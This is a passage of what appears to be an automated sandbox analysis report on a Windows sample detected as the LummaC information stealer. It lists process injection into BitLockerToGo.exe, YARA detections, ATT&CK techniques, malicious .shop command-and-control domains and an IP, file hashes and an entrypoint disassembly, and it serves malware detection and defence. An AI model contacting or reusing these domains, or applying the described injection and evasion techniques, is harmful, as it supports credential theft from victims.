Source: p37SE6gM52.exe, 00000001.00000002.1725521935.000000C000512000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: pianoswimen.shop

Writes to foreign memory regions

Source: C:\Users\user\Desktop\p37SE6gM52.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 2AD0000			Jump to behavior
Source: C:\Users\user\Desktop\p37SE6gM52.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 29C3008			Jump to behavior

Source: C:\Users\user\Desktop\p37SE6gM52.exe

Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Jump to behavior

Source: C:\Users\user\Desktop\p37SE6gM52.exe	Queries volume information: C:\Users\user\Desktop\p37SE6gM52.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\p37SE6gM52.exe	Queries volume information: C:\Windows VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\p37SE6gM52.exe	Queries volume information: C:\Windows\AppReadiness VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\p37SE6gM52.exe	Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\p37SE6gM52.exe	Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\p37SE6gM52.exe	Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Go Injector

Source: Yara match	File source: p37SE6gM52.exe, type: SAMPLE
Source: Yara match	File source: 1.0.p37SE6gM52.exe.7ff6fc380000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.p37SE6gM52.exe.7ff6fc380000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000000.1324374308.00007FF6FCC57000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1728658450.00007FF6FCC57000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: p37SE6gM52.exe PID: 7324, type: MEMORYSTR

Yara detected LummaC Stealer

Source: Yara match

File source: decrypted.memstr, type: MEMORYSTR

Remote Access Functionality

Yara detected Go Injector

Source: Yara match	File source: p37SE6gM52.exe, type: SAMPLE
Source: Yara match	File source: 1.0.p37SE6gM52.exe.7ff6fc380000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.p37SE6gM52.exe.7ff6fc380000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000000.1324374308.00007FF6FCC57000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1728658450.00007FF6FCC57000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: p37SE6gM52.exe PID: 7324, type: MEMORYSTR

Yara detected LummaC Stealer

Source: Yara match

File source: decrypted.memstr, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Windows Management Instrumentation	1 DLL Side-Loading	311 Process Injection	1 Masquerading	OS Credential Dumping	11 Security Software Discovery	Remote Services	1 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Command and Scripting Interpreter	Boot or Logon Initialization Scripts	1 DLL Side-Loading	2 Virtualization/Sandbox Evasion	LSASS Memory	2 Virtualization/Sandbox Evasion	Remote Desktop Protocol	2 Clipboard Data	2 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 PowerShell	Logon Script (Windows)	Logon Script (Windows)	311 Process Injection	Security Account Manager	22 System Information Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	113 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	11 Deobfuscate/Decode Files or Information	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	3 Obfuscated Files or Information	LSA Secrets	Internet Connection Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
p37SE6gM52.exe	53%	ReversingLabs	Win64.Spyware.Lummastealer
p37SE6gM52.exe	100%	Avira	HEUR/AGEN.1326380

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
https://opentelemetry.io/schemas/1.26.0google.golang.org/genproto/protobuf/apigoogle.golang.org/prot	0%	Avira URL Cloud	safe
pianoswimen.shop	100%	Avira URL Cloud	malware
surroundeocw.shop	100%	Avira URL Cloud	malware
priooozekw.shop	100%	Avira URL Cloud	malware
https://racedsuitreow.shop/p	100%	Avira URL Cloud	malware
https://www.cloudflare.com/learning/access-management/phishing-attack/	0%	Avira URL Cloud	safe
https://racedsuitreow.shop/api	100%	Avira URL Cloud	malware
racedsuitreow.shop	100%	Avira URL Cloud	malware
https://racedsuitreow.shop/	100%	Avira URL Cloud	malware
covvercilverow.shop	100%	Avira URL Cloud	malware
https://github.com/golang/protobuf/issues/1609):	0%	Avira URL Cloud	safe
pumpkinkwquo.shop	100%	Avira URL Cloud	malware
abortinoiwiam.shop	100%	Avira URL Cloud	malware
https://golang.org/doc/faq#nil_errorMemory	0%	Avira URL Cloud	safe
https://github.com/uber-go/dig/issues/new	0%	Avira URL Cloud	safe
deallyharvenw.shop	100%	Avira URL Cloud	malware
https://protobuf.dev/reference/go/faq#namespace-conflictserver	0%	Avira URL Cloud	safe
https://www.cloudflare.com/5xx-error-landing	0%	Avira URL Cloud	safe
defenddsouneuw.shop	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
racedsuitreow.shop	104.21.37.97	true	true		unknown
pianoswimen.shop	unknown	unknown	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
priooozekw.shop	true	Avira URL Cloud: malware	unknown
https://racedsuitreow.shop/api	true	Avira URL Cloud: malware	unknown
surroundeocw.shop	true	Avira URL Cloud: malware	unknown
racedsuitreow.shop	true	Avira URL Cloud: malware	unknown
pianoswimen.shop	true	Avira URL Cloud: malware	unknown
covvercilverow.shop	true	Avira URL Cloud: malware	unknown
pumpkinkwquo.shop	true	Avira URL Cloud: malware	unknown
abortinoiwiam.shop	true	Avira URL Cloud: malware	unknown
deallyharvenw.shop	true	Avira URL Cloud: malware	unknown
defenddsouneuw.shop	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://www.cloudflare.com/learning/access-management/phishing-attack/	BitLockerToGo.exe, 00000004.00000003.1731257436.0000000002E33000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1731554267.0000000002E45000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1731193361.0000000002E8C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1731449847.0000000002E35000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://racedsuitreow.shop/p	BitLockerToGo.exe, 00000004.00000002.1744682940.0000000002E0B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://racedsuitreow.shop/	BitLockerToGo.exe, 00000004.00000002.1744682940.0000000002E0B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://opentelemetry.io/schemas/1.26.0google.golang.org/genproto/protobuf/apigoogle.golang.org/prot	p37SE6gM52.exe	false	Avira URL Cloud: safe	unknown
https://github.com/golang/protobuf/issues/1609):	p37SE6gM52.exe	false	Avira URL Cloud: safe	unknown
https://github.com/uber-go/dig/issues/new	p37SE6gM52.exe	false	Avira URL Cloud: safe	unknown
https://protobuf.dev/reference/go/faq#namespace-conflictserver	p37SE6gM52.exe	false	Avira URL Cloud: safe	unknown
https://golang.org/doc/faq#nil_errorMemory	p37SE6gM52.exe	false	Avira URL Cloud: safe	unknown
https://www.cloudflare.com/5xx-error-landing	BitLockerToGo.exe, 00000004.00000003.1731257436.0000000002E33000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1731193361.0000000002E8C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1731449847.0000000002E35000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
104.21.37.97	racedsuitreow.shop	United States		13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1519287
Start date and time:	2024-09-26 09:58:31 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 2s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	9
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	p37SE6gM52.exe renamed because original name is a hash value
Original Sample Name:	cd68144879cf39befd5d96950a78370d.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@3/0@2/1
EGA Information:	Successful, ratio: 50%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target p37SE6gM52.exe, PID 7324 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: p37SE6gM52.exe

Simulations

Behavior and APIs

Time	Type	Description
05:06:04	API Interceptor	2x Sleep call for process: BitLockerToGo.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
104.21.37.97	iq2HxA0SLw.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer	Browse
	file.exe	Get hash	malicious	LummaC	Browse
	LaWl4DY2kW.exe	Get hash	malicious	LummaC	Browse
	file.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer	Browse
	File.exe	Get hash	malicious	LummaC	Browse
	SetupPowerGREP.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer	Browse
	file.exe	Get hash	malicious	LummaC, Vidar	Browse
	file.exe	Get hash	malicious	LummaC	Browse
	file.exe	Get hash	malicious	LummaC, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
racedsuitreow.shop	iq2HxA0SLw.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer	Browse	104.21.37.97
	file.exe	Get hash	malicious	LummaC	Browse	104.21.37.97
	LcDQjpdIiU.exe	Get hash	malicious	LummaC	Browse	172.67.206.221
	BLHvvl44N0.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer	Browse	172.67.206.221
	LcDQjpdIiU.exe	Get hash	malicious	LummaC	Browse	172.67.206.221
	ptgl503.exe	Get hash	malicious	LummaC	Browse	172.67.206.221
	0x000e00000001da78-93.exe	Get hash	malicious	LummaC	Browse	172.67.206.221
	LaWl4DY2kW.exe	Get hash	malicious	LummaC	Browse	104.21.37.97
	file.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer	Browse	104.21.37.97
	File.exe	Get hash	malicious	LummaC	Browse	104.21.37.97

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	3ZD5tEC5DH.exe	Get hash	malicious	LummaC	Browse	172.67.208.139
	HpCQgSai4e.exe	Get hash	malicious	FormBook	Browse	104.21.17.90
	gvyO903Xmm.exe	Get hash	malicious	FormBook	Browse	104.21.70.136
	a7HdB2dU5P.exe	Get hash	malicious	LummaC	Browse	104.21.58.182
	iq2HxA0SLw.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer	Browse	104.21.37.97
	Payment Details.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	RFQ -PO.20571-0001-QBMS-PRQ-0200140.js	Get hash	malicious	AgentTesla, RedLine	Browse	104.26.13.205
	QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	Thyssenkrupp PO040232.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	450230549.exe	Get hash	malicious	AgentTesla	Browse	162.159.134.233

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	3ZD5tEC5DH.exe	Get hash	malicious	LummaC	Browse	104.21.37.97
	a7HdB2dU5P.exe	Get hash	malicious	LummaC	Browse	104.21.37.97
	iq2HxA0SLw.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer	Browse	104.21.37.97
	https://tiktoksc.tv/wap	Get hash	malicious	Unknown	Browse	104.21.37.97
	https://xtrafree.x10.mx/	Get hash	malicious	Unknown	Browse	104.21.37.97
	PersonalizedOffer.exe	Get hash	malicious	UltraVNC	Browse	104.21.37.97
	PersonalizedOffer.exe	Get hash	malicious	UltraVNC	Browse	104.21.37.97
	file.exe	Get hash	malicious	LummaC	Browse	104.21.37.97
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	104.21.37.97
	HHXyi02DYl.exe	Get hash	malicious	LummaC	Browse	104.21.37.97

Dropped Files

⊘No context

Created / dropped Files

⊘No created / dropped files found

Static File Info

General

File type:	PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
Entropy (8bit):	6.299642646855827
TrID:	Win64 Executable (generic) (12005/4) 74.95% Generic Win/DOS Executable (2004/3) 12.51% DOS Executable Generic (2002/1) 12.50% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.04%
File name:	p37SE6gM52.exe
File size:	19'140'096 bytes
MD5:	cd68144879cf39befd5d96950a78370d
SHA1:	f22e8d8421fc6b41de89ab747c1c74b3e934ee2e
SHA256:	2ca1aa726259687599cbc1eac5cb922aa247ce62a537dc1506c95855f3e4322a
SHA512:	280fef539cc4d7f7055f2bd0e2d4a89216f7017cc09dad302db1ed24fd6ddcb8a7c0a6b40d741a20a057eb8b4965f33600d9cb40719e9714aa19ea1c8b2401cd
SSDEEP:	98304:oLWARUU+EelyitGR0xMZvo1VOfyvq6hzyjlEKaZI71zXCgMzDntPv:4+EelNttx4vMVDhaWK5CgoDt
TLSH:	AC173943F8A105E4C6ADD274C9629156BB71BC484B3427D72BA0F7283F72BC4AEB9750
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......................$......$................@............................. *.......$...`... ............................

File Icon


Icon Hash:	9292849051581e12

Static PE Info

General

Entrypoint:	0x1400014c0
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x140000000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, DEBUG_STRIPPED
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x0 [Thu Jan 1 00:00:00 1970 UTC]
TLS Callbacks:	0x4084ee20, 0x1, 0x4084edf0, 0x1, 0x40852890, 0x1
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	1
File Version Major:	6
File Version Minor:	1
Subsystem Version Major:	6
Subsystem Version Minor:	1
Import Hash:	4a438adb9d59c004dab9ec35016a1405

Entrypoint Preview

Instruction
dec eax
sub esp, 28h
dec eax
mov eax, dword ptr [011D5CD5h]
mov dword ptr [eax], 00000001h
call 00007F3BB54557EFh
nop
nop
dec eax
add esp, 28h
ret
nop dword ptr [eax]
dec eax
sub esp, 28h
dec eax
mov eax, dword ptr [011D5CB5h]
mov dword ptr [eax], 00000000h
call 00007F3BB54557CFh
nop
nop
dec eax
add esp, 28h
ret
nop dword ptr [eax]
dec eax
sub esp, 28h
call 00007F3BB5CAE22Ch
dec eax
test eax, eax
sete al
movzx eax, al
neg eax
dec eax
add esp, 28h
ret
nop
nop
nop
nop
nop
nop
nop
dec eax
lea ecx, dword ptr [00000009h]
jmp 00007F3BB5455B09h
nop dword ptr [eax+00h]
ret
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
jmp dword ptr [eax]
inc edi
outsd
and byte ptr [edx+75h], ah
imul ebp, dword ptr [esp+20h], 203A4449h
and cl, byte ptr [edx+47h]
inc edi
insd
push edi
xor dword ptr [eax+6Fh], edi
arpl word ptr [eax+33h], di
inc edx
outsd
inc edx
dec esp
jno 00007F3BB5455BA0h
push ecx
pop edi
pop edi
das
dec ecx
jbe 00007F3BB5455B86h
inc esi
push esp
inc esi
je 00007F3BB5455BABh
imul esi, dword ptr [esp+esi*2], 4Ch
bound ecx, dword ptr [ebp+70h]
jp 00007F3BB5455B83h
arpl word ptr [edx+2Fh], bx
jbe 00007F3BB5455B95h
jns 00007F3BB5455B93h
js 00007F3BB5455B82h
pop edx
jns 00007F3BB5455B66h
bound esp, dword ptr [ebx+33h]

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x1269000	0x4e	.edata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x126a000	0x1438	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x126e000	0x4eae	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x11d8000	0x34da0	.pdata
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x1273000	0x2e78c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x11d6b00	0x28	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x126a48c	0x450	.idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x8593c0	0x859400	1695d412edb6425eee8c9266304488f5	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data	0x85b000	0x7ba10	0x7bc00	3e21f9f7e7885e1fd882591b2d15911b	False	0.2919625946969697	dBase III DBT, version number 0, next free block index 10, 1st item "m/beorn7/perks\011v1.0.1\011h1:VlbKKnNfV8bJzeqoa4cOKqO6bYr3WgKZxO8Z16+hsOM="	4.636654291084892	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata	0x8d7000	0x900950	0x900a00	bb7c79532b0fc8ee2d10cfe5b63e7815	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ
.pdata	0x11d8000	0x34da0	0x34e00	ee1f5c63486867a792e2f5ef7dea3e15	False	0.40082003546099293	data	5.924052740433086	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ
.xdata	0x120d000	0xc60	0xe00	5a2f6e2970c14461d07042a536ec36bb	False	0.26004464285714285	data	4.012516553303575	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ
.bss	0x120e000	0x5a920	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.edata	0x1269000	0x4e	0x200	c2684334cca3c1408744ab422d5952d2	False	0.1328125	data	0.9168902136227094	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ
.idata	0x126a000	0x1438	0x1600	1b138f90f649a373b55b431ea7172e85	False	0.296875	data	4.5877140741561915	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.CRT	0x126c000	0x70	0x200	4703df60354c1e089ce631e168f831d3	False	0.0859375	data	0.48311337148086453	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls	0x126d000	0x10	0x200	bf619eac0cdf3f68d496ea9344137e8b	False	0.02734375	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x126e000	0x4eae	0x5000	96680a6027fe0188a21dee2b50220bda	False	0.174755859375	data	4.526328219663096	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
